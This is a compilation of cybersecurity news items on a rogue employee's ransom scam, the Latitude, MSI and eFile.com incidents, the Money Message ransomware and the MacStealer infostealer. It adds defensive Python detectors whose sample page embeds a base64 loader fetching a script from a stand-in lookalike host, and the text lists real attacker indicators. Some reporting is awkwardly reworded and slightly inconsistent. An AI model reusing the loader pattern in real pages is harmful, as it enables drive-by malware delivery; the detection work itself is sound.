As part of the company's internal investigation and incident response effort, Liles joined other company staff and the police in investigating the attack.

During this period, Liles is said to have tried to enrich himself from the attack by tricking his employer into paying the ransom to him instead of to the actual external attacker.

The SEROCU announcement reads, "Instead of pursuing a criminal case against the company, Liles also began a further and secondary attack against the company unbeknownst to the police, his colleagues, or his employer." 

He accessed a board member's private emails more than 300 times, altered the original blackmail email sent by the attacker, and changed the payment information the attacker had provided.

The plan was to take advantage of the situation by diverting the payment from the attacker's payment account to Liles' own cryptocurrency wallet.

Liles also created an email address that looked almost identical to the original attacker's and sent emails to his employer asking for payment, said SEROCU.

The company owner refused to pay the attackers, and the internal investigation under way at the time revealed that Liles had accessed the private emails, as evidenced by his home IP address, suggesting that he was responsible for the secondary attack.

By the time SEROCU's cyber-crime team arrived at Liles' home to seize his computer, Liles, well aware that the investigation was closing in on him, had wiped all data from his devices. However, the incriminating data could still be restored from his computer.

At a hearing at Reading Crown Court, Liles pleaded guilty, five years after he first denied any involvement in the case. The rogue employee will be sentenced on July 11th, 2023.

Accessing a computer without permission is punishable by up to two years in prison in the UK, while blackmail is punishable by up to 14 years in prison.

Latitude Financial Breaches Customer Data, Coles Warns

Supermarket giant Coles has confirmed that the Latitude Financial data breach has affected it. According to the report, a cybercriminal gang stole the information used to issue previous Coles credit cards.

The 14 million stolen customer records, taken in a hack detected last month, included 7.9 million driver's license numbers and about 53,000 passport numbers. According to the company's report, the breach occurred in March 2023 and was reported to the regulators.

Latitude Financial Services has notified Coles of the breach and is in the process of reaching out to all affected clients.

The breach compromised thousands of passport numbers along with personal information such as driver's license numbers, names, addresses, and dates of birth.

The supermarket giant has not yet been told how many customer accounts were affected by the incident.

Coles has yet to release any further information on the data breach. Latitude Financial has confirmed that historical Coles credit card holders were affected by the breach, and a Latitude Financial spokesperson is contacting the affected customers. "In March 2018, Coles Financial Services moved its credit cards to Citibank," a Coles spokeswoman said.

Latitude has confirmed contact with the group behind the hack, which sent Latitude a ransom note demanding payment.

The company is taking a variety of measures to support and inform customers affected by the loss of their personal information and to explain what happened.

Although a third-party platform was likely involved in the breach, Latitude has not released this information, nor have the criminals revealed who they are.

Additionally, the firm has established a contact center in Australia and New Zealand to assist individuals affected by the incident, and has assured customers that it will reimburse them for the replacement of any stolen identification documents.

Multiple attempts have been made to contact Myer as well as Latitude Financial, both of which have branded Visa credit cards through GE Money.

Several major retailers, such as Harvey Norman, The Good Guys, JB Hi-Fi, Apple, and Amart Furniture, offer interest-free credit cards and personal loans through Latitude Financial, formerly known as GE Money. This is one of the most significant data breaches ever to take place in Australia.

Firmware Caution Advises MSI Cyberattack

Modern corporations, gaming hardware manufacturers included, face constant attacks from malicious hackers and other digital no-goodniks. MSI has now confirmed to its customers that it was attacked.

It has been reported that the network of Taiwanese computer manufacturer MSI (short for Micro-Star International) was compromised in a cyberattack. MSI has said little about how much damage was caused, and the attackers have threatened to release proprietary software and source code.

As reported earlier this week, a ransomware group infiltrated MSI's systems using the Money Message ransomware. Unless the company pays the hackers a $4 million ransom, the stolen corporate data will be released online next week.

MSI advises all of its customers to obtain BIOS and firmware updates only from the MSI website and not from anywhere else.

As expected, few details are available, but it seems that MSI initiated "defense mechanisms and recovery measures" after detecting network anomalies and then notified law enforcement and the government.

Earlier this week, in a filing with the Taiwan Stock Exchange (TWSE) first spotted by PCMag, MSI revealed that a cyberattack had hit some of its information service systems. The attack has been reported to the appropriate authorities.

The criminal group is demanding a $4 million ransom to avert the release of the entire data cache on the web. Although MSI does not give details, it warns customers not to download BIOS/UEFI files or firmware from any source other than the company's website, which suggests that compromised software may already be circulating in the wild.

It was reported yesterday that the company had suffered a cyberattack. According to the report, the attacker, a ransomware group called Money Message, claims to have stolen source code, a BIOS development framework, and private keys.

Chat logs on the group's site showed that it claims to have stolen 1.5 TB of data and wants a ransom payment of over four million dollars for it. Whether these claims are connected to the filing, or whether MSI paid a ransom for the files, is unclear.

In a report, MSI representatives said that the company had regained normal operations after restoring its systems and had seen minimal impact on its day-to-day operations. If the company is telling the truth, customers who exercise the usual level of due diligence when downloading software, drivers, and updates should not have too much to worry about. According to rumors, this hack is unrelated to fraudulent emails in February that purported to offer content creators lucrative sponsorship deals through MSI.

MSI also advises its customers to use the official MSI website exclusively for BIOS and firmware updates rather than unreliable sources such as unknown websites or torrent sites. For users who search the internet for modified or unofficial firmware dumps for their devices, even ones believed to be perfectly safe, this advice makes such a search rather pointless.

eFile.com Hosted Malware on its Website

Malicious code was injected into the server of eFile.com, an online service that helps people file tax returns, resulting in malware being delivered to users' computers.

The software service, which is authorized by the Internal Revenue Service (IRS) but not operated by it, was found to have been serving malware for several weeks before it was cleaned up earlier this week.

E-filing is the official IRS method for filing tax documents online, or electronically, usually without printing any documents, and the IRS recommends it for all federal tax filings. Citizens can use software programs or websites to submit their tax returns, although such external services can pose additional security risks.

With the April 18th tax-filing deadline for US citizens approaching, cybercriminals are exploiting it to step up malicious campaigns against tax-filing services and their users in order to obtain private information. eFile.com, which in recent weeks has been one of the most popular sites for filing tax returns, has again become a victim of tax-related cybercrime.

The security incident affects eFile.com specifically, not the IRS' e-file infrastructure or similar-sounding domains.

In addition to the base64-encoded script, further JavaScript is loaded from amanewonliag dot online. If the user follows the malware's prompt, they are asked to download an executable named "update.exe" or "installer.exe", depending on the browser they are using.

On further inspection, researchers found a PHP backdoor in the executable binaries. Backdoors of this kind connect to IP addresses located in Tokyo, such as 47.245.6.91, hosted by Alibaba. The same IP address also hosted the infoamanewonliag domain that the malicious script popper.js contacted.

In mid-March, a Reddit user first reported that the eFile.com website had been compromised, with visitors being redirected to a fake 'network error' page and served a false browser update.

If the user clicks the browser update link, they are served either update.exe or installer.exe, depending on the operating system. In a recent write-up published by the SANS Internet Storm Center, Johannes Ullrich pointed out that the malicious files had very low detection rates on VirusTotal.

He also discovered that 'update.exe' was signed with a valid certificate issued to a company named Sichuan Niurui Science and Technology Co., Ltd.

In a follow-up post, Ullrich explains that analysis of update.exe shows it to be a Python downloader that fetches a PHP script, which establishes communication with the command-and-control server and is further used to send messages to the attacker.

Analysis of a sample of the PHP script seen by MalwareHunterTeam determined it to be backdoor malware, through which threat actors can access the device remotely and take control of it.

The PHP script is installed in the background during malware distribution.

The malware contacts the threat actors' remote command-and-control server every ten seconds and, as soon as it receives a task to run on the infected device, begins executing it.

As a backdoor, the eFile backdoor offered only the basics of what such malware provides, but it was still dangerous enough to give cybercriminals full access to a Windows PC, and with it the leverage to attack other systems on a corporate network.

eFile.com has yet to explain what happened. A cyber gang named OLOC, linked to LockBit ransomware, claims to have already attacked the website in January 2022.

According to the researcher, eFile removed the malicious JavaScript from the website on the 3rd of April. The attackers had apparently tried to remove the infection themselves before that, probably to cover their tracks. The malicious code appears to have been injected into every page on eFile.com as part of the attack.
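The injection described above combines two detectable traits: an inline script carrying a base64 blob that decodes to loader JavaScript, and a script fetched from a domain the site does not own. The scanner below, an added example that is not eFile.com's code or the researchers' tooling, flags both on a constructed sample page; the allowlisted hosts and the lookalike domain are placeholders.

```python
"""Flag injected scripts in HTML pages: base64 blobs that decode to
script-loading JavaScript, and external <script src> hosts outside an
allowlist. Sample page and hostnames are constructed for this example."""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings that suggest a decoded blob is JavaScript pulling in more code.
_JS_LOADER_MARKERS = ("createElement", "script", ".src", "eval(", "document.write")
# A run of base64 alphabet long enough to be a payload rather than an identifier.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


class _ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # src attribute of each <script src=...>
        self.inline = []    # body of each inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def decode_base64_blobs(text):
    """Return the decoded form of every base64-looking run that decodes
    to printable UTF-8; binary or malformed runs are ignored."""
    decoded = []
    for match in _B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            payload = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in payload):
            decoded.append(payload)
    return decoded


def scan_page(html, allowed_hosts):
    """Return a list of (kind, detail) findings for one HTML page."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname
        # A relative src has no hostname and is same-origin: not a finding.
        if host and host.lower() not in allowed_hosts:
            findings.append(("external_script", host.lower()))
    for body in collector.inline:
        for payload in decode_base64_blobs(body):
            if any(marker in payload for marker in _JS_LOADER_MARKERS):
                findings.append(("base64_loader", payload.strip()[:80]))
    return findings


# Constructed sample: hosts the site legitimately serves scripts from.
ALLOWED_HOSTS = {"www.taxsite.test", "cdn.taxsite.test"}

# Constructed loader modelled on the described injection (placeholder domain).
_LOADER_JS = ("var s=document.createElement('script');"
              "s.src='https://cdn-lookalike.example/popper.js';"
              "document.head.appendChild(s);")
_LOADER_B64 = base64.b64encode(_LOADER_JS.encode()).decode()

SAMPLE_PAGE = f"""<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.taxsite.test/vendor.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>eval(atob("{_LOADER_B64}"));</script>
<script src="https://cdn-lookalike.example/popper.js"></script>
</head><body>Tax filing form</body></html>"""

CLEAN_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>Tax filing form</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(f"{kind}: {detail}")
```

Run against a crawl of a site's own pages, the same two checks catch the "injected into every page" pattern the researcher describes, since each infected page yields the same findings.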

Million-Dollar Ransom Demanded by Ransomware Gang 

In recent years, an alarming number of ransomware groups have sprung up on the threat landscape, like mushrooms after a shower.

In recent months, an emerging ransomware group called 'Money Message' has appeared. It targets victims worldwide and demands ransoms of up to a million dollars to keep confidential data private. Besides a Chinese airline with annual revenue of approximately $1 billion, there have been at least two other victims of the group. The group provides a screenshot of the accessed file system as proof that it has stolen data from the company. Since then, five more successful ransomware attacks have been reported, the latest on April 4.

Money Message currently lists two victims on its leak site: an Asian airline with over $1 billion in assets and an unnamed vendor of personal computer hardware. The group's encryptor is written in C++ and contains an embedded JSON configuration file that determines how encryption proceeds on the victim's device.

The configuration file specifies which folders are excluded from encryption, what extension should be appended, which services and processes should be terminated, whether logging is enabled, and likely domain login names and passwords to be used for encrypting other devices. The victim can contact the threat actors via a link provided.

The link leads to a Tor negotiation site. Although Money Message's encryptor is not very advanced, it still encrypts devices and steals data. By default no extension is appended to encrypted files, though this can be changed for each victim. According to Rivitna, a security researcher who has analyzed encrypted files for more than a decade, the encryptor uses ChaCha20 and ECDH encryption.

In its latest posting, Money Message has also been playing up the dramatics: the gang has put a reveal counter on its website that reportedly counts down to the moment it reveals the target and publishes the data it holds.

After encrypting the device, the ransomware creates a ransom note titled 'money_message.log' containing the link used to negotiate with the threat actors.

If the ransom is not paid, the stolen information is published on the group's data leak site.

In one case, Money Message published data containing travelers' information three days after listing the victim.

Other victims include an insurance company in the United States and a distributor of iron and glass products. Money Message has extorted large sums from its victims over the years, and when a ransom was not paid, the exfiltrated data was published in the public domain.

Although Money Message does not appear to be a sophisticated piece of malware, it remains a serious threat to businesses: it targets them, steals their data, and extorts them for money.

New ransomware groups keep emerging, underscoring that organizations face more threats each day. Protect your data by putting proper security measures in place.

iCloud Keychain Data and Passwords are at Risk From MacStealer Malware

Uptycs, a cybersecurity company that discovered the information-stealing malware while hunting for threats on the dark web, is warning that Mac computers are the latest target of updated info-stealing malware.

MacStealer is a new information stealer that harvests credentials from web browsers and cryptocurrency wallets, as well as potentially sensitive files stored in the iCloud Keychain.

MacStealer is sold as malware-as-a-service (MaaS): the developer sells pre-built builds for $100, and buyers run their own campaigns to spread the malware to victims.

On the dark web, cybercriminals increasingly treat Mac computers as fertile ground for launching malware and conducting illegal activities.

The Uptycs threat research team reported that the newly discovered macOS malware runs on multiple versions of the operating system, from Catalina (10.15) through Apple's latest release, Ventura (13.2).

Sellers claim the malware is still in beta testing and that no panel or builder is available; instead, the seller provides pre-built DMG payloads that infect macOS Big Sur, Monterey, and Ventura.

The threat actor uses the lack of a builder and panel to justify the low $100 price, while promising to release more advanced features as soon as possible.

MacStealer uses Telegram as a command-and-control (C2) platform to exfiltrate data; the latest example is called PharmBot. It primarily affects computers running macOS Catalina and later on M1 or M2 CPUs.

According to Uptycs' Shilpesh Trivedi and Pratik Jeware in their latest report on MacStealer, the tool steals files, browser cookies, and login information from the victim.

First advertised on online hacking forums at the beginning of the month for $100, the project is still far from finished; its authors have floated adding features to harvest data from Apple's Notes app and the Safari web browser.

Functioning of Malware

The threat actors distribute MacStealer as an unsigned DMG file disguised as a legitimate macOS application that the victim is tricked into opening.

Once launched, it presents the victim with a fake but convincing password prompt; with the password entered there, the malware begins collecting credentials from the compromised machine.

Once all the data described above has been collected, the malware packs it into a ZIP file and sends it to a remote server, from which the threat actor can later retrieve it.

MacStealer also sends basic information to a pre-configured Telegram channel, so the operator is notified immediately when new stolen data arrives and can download the ZIP file right away.
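As an added example (not code from Uptycs or from the original post), the following Python correlates the two behaviours just described: a sizeable ZIP upload to an unfamiliar host followed shortly by a request to the Telegram Bot API from the same machine. The proxy log format, host names, process names and allowlists are all constructed for this example.

```python
from datetime import datetime, timedelta

# Constructed sample proxy log (not from any real incident). Fields:
# timestamp  source_host  process  method  destination  content_type  bytes
SAMPLE_LOG = """\
2023-03-27T09:14:02 mbp-design-07 Safari GET cdn.example.org text/html 5120
2023-03-27T09:15:41 mbp-design-07 updater POST 203.0.113.45 application/zip 4812345
2023-03-27T09:15:44 mbp-design-07 updater POST api.telegram.org application/json 512
2023-03-27T09:16:10 mbp-dev-12 Telegram POST api.telegram.org application/json 880
2023-03-27T09:20:00 mbp-dev-12 curl POST files.example.org application/zip 2048000
2023-03-27T10:00:00 mbp-ops-03 rsync POST 198.51.100.7 application/zip 9000000
"""

WINDOW = timedelta(minutes=2)              # max gap between upload and Telegram call
MIN_ZIP_BYTES = 100_000                    # ignore tiny archives
UPLOAD_ALLOWLIST = {"files.example.org"}   # hosts where ZIP uploads are expected (constructed)
TELEGRAM_CLIENTS = {"Telegram"}            # processes allowed to talk to the Telegram API

def parse(log_text):
    """Split each constructed log line into a dict with a parsed timestamp."""
    events = []
    for line in log_text.strip().splitlines():
        ts, src, proc, method, dst, ctype, size = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "src": src, "proc": proc,
                       "method": method, "dst": dst, "ctype": ctype, "size": int(size)})
    return events

def find_exfil_chains(events):
    """Return (source_host, process, upload_destination) for every sizeable ZIP
    upload to a non-allowlisted host that is followed within WINDOW by a request
    to api.telegram.org from the same host by a process that is not a Telegram
    client. Either behaviour alone is noisy; the pair is the MacStealer pattern."""
    alerts = []
    for up in events:
        if not (up["method"] == "POST" and up["ctype"] == "application/zip"
                and up["size"] >= MIN_ZIP_BYTES and up["dst"] not in UPLOAD_ALLOWLIST):
            continue
        for ev in events:
            if (ev["src"] == up["src"] and ev["dst"] == "api.telegram.org"
                    and ev["proc"] not in TELEGRAM_CLIENTS
                    and up["ts"] <= ev["ts"] <= up["ts"] + WINDOW):
                alerts.append((up["src"], up["proc"], up["dst"]))
                break
    return alerts

if __name__ == "__main__":
    for src, proc, dst in find_exfil_chains(parse(SAMPLE_LOG)):
        print(f"ALERT {src}: {proc} uploaded a ZIP to {dst}, then contacted api.telegram.org")
```

Only the design workstation trips the rule: the developer machine's Telegram traffic comes from the real client and its ZIP went to an allowlisted host, and the ops host never contacts Telegram.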

What can You do to Protect Your Mac?

Start by making sure your Mac is running the latest software update: open the Settings app and check whether a newer version is available.

If one is, install it as soon as possible. Keep all your Apple devices up to date, since Apple is constantly improving its security.

Antivirus software adds a further layer of protection against malware and against malicious links on the internet.

Stealer malware spreads through email attachments, bogus software downloads, and other social-engineering techniques.

Keeping the operating system and security software up to date is one of the best ways to mitigate such threats. Users should also avoid downloading files from unknown sources or clicking on untrusted links.

"It becomes more important for data stored on Macs to be protected from attackers as Macs become more popular among leadership teams as well as development and design teams within organizations," SentinelOne researcher Phil Stokes said in a statement last week.